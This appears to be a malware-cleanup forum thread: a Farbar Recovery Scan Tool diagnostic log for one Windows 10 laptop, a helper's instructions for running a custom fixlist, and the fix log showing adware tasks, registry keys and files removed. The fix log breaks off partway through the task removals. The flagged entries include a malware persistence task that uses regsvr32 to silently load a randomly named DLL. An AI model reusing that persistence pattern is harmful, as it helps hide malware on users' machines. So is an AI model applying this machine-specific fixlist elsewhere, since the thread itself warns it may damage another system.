Description: Faulting application name: ShellExperienceHost.exe, version: 10.0.10586.494, time stamp: 0x5775e94c
Faulting module name: StartUI.dll, version: 10.0.10586.494, time stamp: 0x5775e851
Exception code: 0xc0000005
Fault offset: 0x00000000002990c8
Faulting process id: 0x164c
Faulting application start time: 0x01d284d68cb9af7b
Faulting application path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Faulting module path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\StartUI.dll
Report Id: ec43ee36-371d-46ad-9a3e-6420d8f1090f
Faulting package full name: Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: App

Error: (02/11/2017 06:15:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HPWMISVC.exe, version: 2.5.3.0, time stamp: 0x4ed4a2e7
Faulting module name: OLEAUT32.dll, version: 10.0.10586.0, time stamp: 0x5632d5ee
Exception code: 0xc0000005
Fault offset: 0x00019ca4
Faulting process id: 0x8bc
Faulting application start time: 0x01d284d592f3ce57
Faulting application path: C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
Faulting module path: C:\WINDOWS\SYSTEM32\OLEAUT32.dll
Report Id: 1e3afce1-5f63-4fab-87be-d8a4547a490b
Faulting package full name:
Faulting package-relative application ID:

Error: (02/11/2017 06:13:14 PM) (Source: ATIeRecord) (EventID: 16396) (User: )
Description: ATI EEU PnP start/stop failed

Error: (02/11/2017 06:03:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Explorer.EXE, version: 10.0.10586.494, time stamp: 0x5775e575
Faulting module name: ntdll.dll, version: 10.0.10586.306, time stamp: 0x571af2eb
Exception code: 0xc0000005
Fault offset: 0x000000000002e909
Faulting process id: 0x108c
Faulting application start time: 0x01d284c853f519a8
Faulting application path: C:\WINDOWS\Explorer.EXE
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: fec2c750-0488-4aae-8404-979553ef3ed8
Faulting package full name:
Faulting package-relative application ID:

Error: (02/11/2017 04:46:07 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program explorer.exe version 10.0.10586.494 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: 108c

Start Time: 01d284c853f519a8

Termination Time: 4294967295

Application Path: C:\Windows\explorer.exe

Report Id: 96c7338a-f0bc-11e6-93cf-74e543244a4e

Faulting package full name:

Faulting package-relative application ID:

Error: (02/11/2017 04:40:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HPWMISVC.exe, version: 2.5.3.0, time stamp: 0x4ed4a2e7
Faulting module name: OLEAUT32.dll, version: 10.0.10586.0, time stamp: 0x5632d5ee
Exception code: 0xc0000005
Fault offset: 0x00019ca4
Faulting process id: 0x8c8
Faulting application start time: 0x01d284c847f24e22
Faulting application path: C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
Faulting module path: C:\WINDOWS\SYSTEM32\OLEAUT32.dll
Report Id: 1ceb18d1-6b41-4b14-be5b-ddf439946858
Faulting package full name:
Faulting package-relative application ID:

Error: (02/11/2017 04:38:03 PM) (Source: ATIeRecord) (EventID: 16396) (User: )
Description: ATI EEU PnP start/stop failed

Error: (02/11/2017 04:36:14 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HP-RRR)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (02/11/2017 02:58:44 PM) (Source: ATIeRecord) (EventID: 16396) (User: )
Description: ATI EEU PnP start/stop failed


System errors:
=============
Error: (02/11/2017 07:49:56 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0xc1900107: Feature update to Windows 10, version 1607.

Error: (02/11/2017 07:04:51 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0xc1900107: Feature update to Windows 10, version 1607.

Error: (02/11/2017 06:16:10 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HPWMISVC service terminated unexpectedly. It has done this 1 time(s).

Error: (02/11/2017 06:15:43 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the HPWMISVC service.

Error: (02/11/2017 06:13:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The NetPipeActivator service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (02/11/2017 06:13:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The NetMsmqActivator service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (02/11/2017 06:13:55 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the NetPipeActivator service to connect.

Error: (02/11/2017 06:13:55 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the NetMsmqActivator service to connect.

Error: (02/11/2017 06:13:18 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NetTcpActivator service depends on the NetTcpPortSharing service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (02/11/2017 06:11:52 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80010108: Cumulative Update for Windows 10 Version 1511 for x64-based Systems (KB3210721).


CodeIntegrity:
===================================
Date: 2017-02-11 19:04:30.883
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-02-11 17:48:59.390
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-11 17:48:59.349
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-11 17:48:59.202
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-11 14:49:28.187
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-11 14:49:28.103
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-11 14:49:27.995
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:27.004
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:26.969
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:26.908
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: AMD A6-4400M APU with Radeon(tm) HD Graphics
Percentage of memory in use: 49%
Total physical RAM: 3561.36 MB
Available physical RAM: 1782.79 MB
Total Virtual: 7145.36 MB
Available Virtual: 4789.45 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:445.3 GB) (Free:387.17 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Recovery) (Fixed) (Total:20.16 GB) (Free:2.14 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (86489) (CDROM) (Total:7.39 GB) (Free:0 GB) UDF

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 915B52F3)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=445.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=20.2 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=103 MB) - (Type=0C)

==================== End of Addition.txt ============================
 
Download the attached fixlist.txt file and save it to the Desktop.
NOTE: It's important that both files, FRST and fixlist.txt, are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST(FRST64) and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it in your reply.
 

Fix result of Farbar Recovery Scan Tool (x64) Version: 12-02-2017
Ran by Randy (11-02-2017 21:03:06) Run:2
Running from C:\Users\Randy\Desktop\Virus
Loaded Profiles: Randy (Available Profiles: Randy & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
HKLM-x32\...\Run: [] => [X]
ShellIconOverlayIdentifiers-x32: [ CustomFolderNotSynced] -> {4008A679-BE48-456D-A32E-97DE3F48E10D} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ CustomFolderSynced] -> {4DD1429E-055B-4585-9E4D-614252FD7FC1} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FileNotSynced] -> {267973DC-2B3C-41CE-93F1-D2C5CCC06663} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FileSynced] -> {DBD42211-56CD-4C08-A3E4-48ED07AD7759} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FolderExcluded] -> {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FolderNotSynced] -> {3E2576B1-5B08-47DE-8803-95C6ECA734EE} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FolderSynced] -> {2858A960-566F-45CF-951E-4B3099E70E6F} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
Toolbar: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\prefs.js [2015-12-11] <==== ATTENTION (Points to *.cfg file)
U3 idsvc; no ImagePath
U3 wpcsvc; no ImagePath
2016-08-08 20:54 - 2017-02-10 21:18 - 0000115 _____ () C:\Users\Randy\AppData\Roaming\LogFile.txt
2016-06-19 06:26 - 2016-06-19 06:26 - 2049556 _____ () C:\Users\Randy\AppData\Roaming\sb0.dat
2016-06-10 06:41 - 2016-06-10 06:41 - 2049556 _____ () C:\Users\Randy\AppData\Roaming\sb203.dat
2016-02-17 11:41 - 2016-08-05 17:41 - 0000228 _____ () C:\Users\Randy\AppData\Roaming\WB.CFG
2015-11-15 15:05 - 2015-11-15 15:05 - 0002560 _____ () C:\Users\Randy\AppData\Local\uninstall.exe
2015-01-27 15:51 - 2015-01-27 15:51 - 0000057 _____ () C:\ProgramData\Ament.ini
2016-08-08 22:40 - 2016-08-08 22:41 - 8464000 _____ (SpeedyPC Software Inc.) C:\Users\Randy\AppData\Local\Temp\OMD5938.tmp.exe
Task: {02838A17-EB1E-41DC-A610-4FACFC9CFC90} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {085C37EA-1E33-4C9E-87B8-3E576F3FE4AB} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {0B0B1AAD-0AF0-4618-BDEF-CDDEDF582AD0} - System32\Tasks\JZIP => C:\Program Files (x86)\JZIP\JZIP\JZIP.exe <==== ATTENTION
Task: {0CBCDC29-56A3-4015-A06E-8FD4AABD553B} - \SmartWeb Upgrade Trigger Task -> No File <==== ATTENTION
Task: {1E0973D5-7653-49B7-B013-63DB348A9012} - \ShopperProJSUpd -> No File <==== ATTENTION
Task: {1EAE785B-1358-435B-86E7-5860D0FEE3D6} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {2C627394-07F4-4001-84C6-96DA554AC5A0} - \IBUpd -> No File <==== ATTENTION
Task: {477A9893-3F9C-40B5-ADA0-FC96EE6735EC} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {49E80698-374B-426E-BD1D-E0ECDA6BD4A4} - \SwiftSearch Auto Updater 1.10.0.25 Core -> No File <==== ATTENTION
Task: {4CD1D841-791C-485F-9229-FDD5EE9C27CF} - System32\Tasks\SpeedyBackup reigistration schedule startup => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe <==== ATTENTION
Task: {4D2E3B92-6CEE-4C6C-82C1-BF7C4B59FE7E} - \systemmgr -> No File <==== ATTENTION
Task: {5840CBCE-7F77-411E-B033-1C1AF189ADB5} - \1f308483-1a6e-493d-ae8f-5dd8634c5004-4 -> No File <==== ATTENTION
Task: {69480AF7-F603-4EA8-8F93-EA6B8C01E138} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {766E1EC9-58D6-40FB-BAC5-6BD45B994FC5} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {89FF84C6-2FF3-4ADC-9311-2162837E1C22} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> No File <==== ATTENTION
Task: {934CAF6C-AD19-40B5-8ACE-AC40D21BBF28} - System32\Tasks\{0532BE32-87D9-B0CA-75BD-6DEE5839A94C} => Regsvr32.exe /s /n /I:"/rt" "C:\PROGRA~3\261dc3b1\57c348f3.dll" <==== ATTENTION
Task: {A433E40E-B066-4216-A8FB-2E412069CE29} - System32\Tasks\SpeedyBackup Startup => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe <==== ATTENTION
Task: {B1619F2B-5CE9-4EC5-A3E5-FD048FF487E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B7731159-01AA-4BAF-8508-D5D744AB61D2} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {C6518B78-A01B-4FE6-8AF0-38C0BBF48E58} - \SwiftSearch Auto Updater 1.10.0.25 Pending Update -> No File <==== ATTENTION
Task: {D6F2BC1F-773E-4624-9FAA-578BE389CD0E} - System32\Tasks\SpeedyBackup reigistration schedule => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe <==== ATTENTION
Task: {E1DEA695-EE7F-4FB6-A4F0-EB278B1FD47B} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {E6542D06-DBEF-4690-A07E-F59316EEB423} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {F2EF1CA8-784E-427A-A1D4-97AEB2EB4A85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {FA4F0A0E-8234-469C-B0EB-2375D63F521A} - \Inst_Rep -> No File <==== ATTENTION
Task: {FFCE8EEA-7117-44A9-8BD4-0C6EA5CEE61E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\NNKcNIsK9b1hl0VgyglYTRwSD.job => C:\Users\Randy\AppData\Roaming\NNKcNIsK9b1hl0VgyglYTRwSD.exe <==== ATTENTION
C:\Users\Randy\AppData\Roaming\NNKcNIsK9b1hl0VgyglYTRwSD.exe
Task: C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job => C:\Program Files (x86)\Common Files\SpeedyPC Software\UUS3\SpeedyPC_Update3.exe <==== ATTENTION
C:\Program Files (x86)\Common Files\SpeedyPC Software
(SpeedyPC Software) C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupService.exe
C:\Program Files (x86)\SpeedyPC Software
ShellIconOverlayIdentifiers: [ CustomFolderNotSynced] -> {4008A679-BE48-456D-A32E-97DE3F48E10D} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ CustomFolderSynced] -> {4DD1429E-055B-4585-9E4D-614252FD7FC1} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FileNotSynced] -> {267973DC-2B3C-41CE-93F1-D2C5CCC06663} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FileSynced] -> {DBD42211-56CD-4C08-A3E4-48ED07AD7759} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderExcluded] -> {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderNotSynced] -> {3E2576B1-5B08-47DE-8803-95C6ECA734EE} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderSynced] -> {2858A960-566F-45CF-951E-4B3099E70E6F} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
R2 BackupService; C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupService.exe [247808 2016-05-06] (SpeedyPC Software) [File not signed]
2017-02-11 20:20 - 2016-08-08 22:41 - 00000512 _____ C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job
2017-02-11 18:15 - 2016-08-08 22:41 - 00000496 _____ C:\WINDOWS\Tasks\SpeedyBackup Startup.job
2017-02-11 18:13 - 2016-08-08 22:41 - 00000530 _____ C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job
2017-02-11 18:13 - 2016-08-08 22:41 - 00000522 _____ C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job
Task: C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe
Task: C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe
Task: C:\WINDOWS\Tasks\SpeedyBackup Startup.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe

*****************

HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderNotSynced => key not found.
HKCR\Wow6432Node\CLSID\{4008A679-BE48-456D-A32E-97DE3F48E10D} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderSynced => key not found.
HKCR\Wow6432Node\CLSID\{4DD1429E-055B-4585-9E4D-614252FD7FC1} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileNotSynced => key not found.
HKCR\Wow6432Node\CLSID\{267973DC-2B3C-41CE-93F1-D2C5CCC06663} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileSynced => key not found.
HKCR\Wow6432Node\CLSID\{DBD42211-56CD-4C08-A3E4-48ED07AD7759} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderExcluded => key not found.
HKCR\Wow6432Node\CLSID\{43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderNotSynced => key not found.
HKCR\Wow6432Node\CLSID\{3E2576B1-5B08-47DE-8803-95C6ECA734EE} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderSynced => key not found.
HKCR\Wow6432Node\CLSID\{2858A960-566F-45CF-951E-4B3099E70E6F} => key not found.
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => value removed successfully
HKCR\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => key not found.
HKLM\Software\Wow6432Node\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0 => key removed successfully
C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\prefs.js => moved successfully
HKLM\System\CurrentControlSet\Services\idsvc => key removed successfully
idsvc => service removed successfully
HKLM\System\CurrentControlSet\Services\wpcsvc => key removed successfully
wpcsvc => service removed successfully
C:\Users\Randy\AppData\Roaming\LogFile.txt => moved successfully
C:\Users\Randy\AppData\Roaming\sb0.dat => moved successfully
C:\Users\Randy\AppData\Roaming\sb203.dat => moved successfully
C:\Users\Randy\AppData\Roaming\WB.CFG => moved successfully
C:\Users\Randy\AppData\Local\uninstall.exe => moved successfully
C:\ProgramData\Ament.ini => moved successfully
C:\Users\Randy\AppData\Local\Temp\OMD5938.tmp.exe => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{02838A17-EB1E-41DC-A610-4FACFC9CFC90} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{02838A17-EB1E-41DC-A610-4FACFC9CFC90} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{085C37EA-1E33-4C9E-87B8-3E576F3FE4AB} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{085C37EA-1E33-4C9E-87B8-3E576F3FE4AB} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0B0B1AAD-0AF0-4618-BDEF-CDDEDF582AD0} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0B0B1AAD-0AF0-4618-BDEF-CDDEDF582AD0} => key removed successfully
C:\WINDOWS\System32\Tasks\JZIP => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\JZIP => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0CBCDC29-56A3-4015-A06E-8FD4AABD553B} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0CBCDC29-56A3-4015-A06E-8FD4AABD553B} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SmartWeb Upgrade Trigger Task => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1E0973D5-7653-49B7-B013-63DB348A9012} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1E0973D5-7653-49B7-B013-63DB348A9012} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ShopperProJSUpd => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1EAE785B-1358-435B-86E7-5860D0FEE3D6} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1EAE785B-1358-435B-86E7-5860D0FEE3D6} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C627394-07F4-4001-84C6-96DA554AC5A0} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C627394-07F4-4001-84C6-96DA554AC5A0} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IBUpd => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{477A9893-3F9C-40B5-ADA0-FC96EE6735EC} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{477A9893-3F9C-40B5-ADA0-FC96EE6735EC} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{49E80698-374B-426E-BD1D-E0ECDA6BD4A4} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{49E80698-374B-426E-BD1D-E0ECDA6BD4A4} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SwiftSearch Auto Updater 1.10.0.25 Core => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4CD1D841-791C-485F-9229-FDD5EE9C27CF} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4CD1D841-791C-485F-9229-FDD5EE9C27CF} => key removed successfully
C:\WINDOWS\System32\Tasks\SpeedyBackup reigistration schedule startup => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpeedyBackup reigistration schedule startup => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4D2E3B92-6CEE-4C6C-82C1-BF7C4B59FE7E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4D2E3B92-6CEE-4C6C-82C1-BF7C4B59FE7E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\systemmgr => key not found.
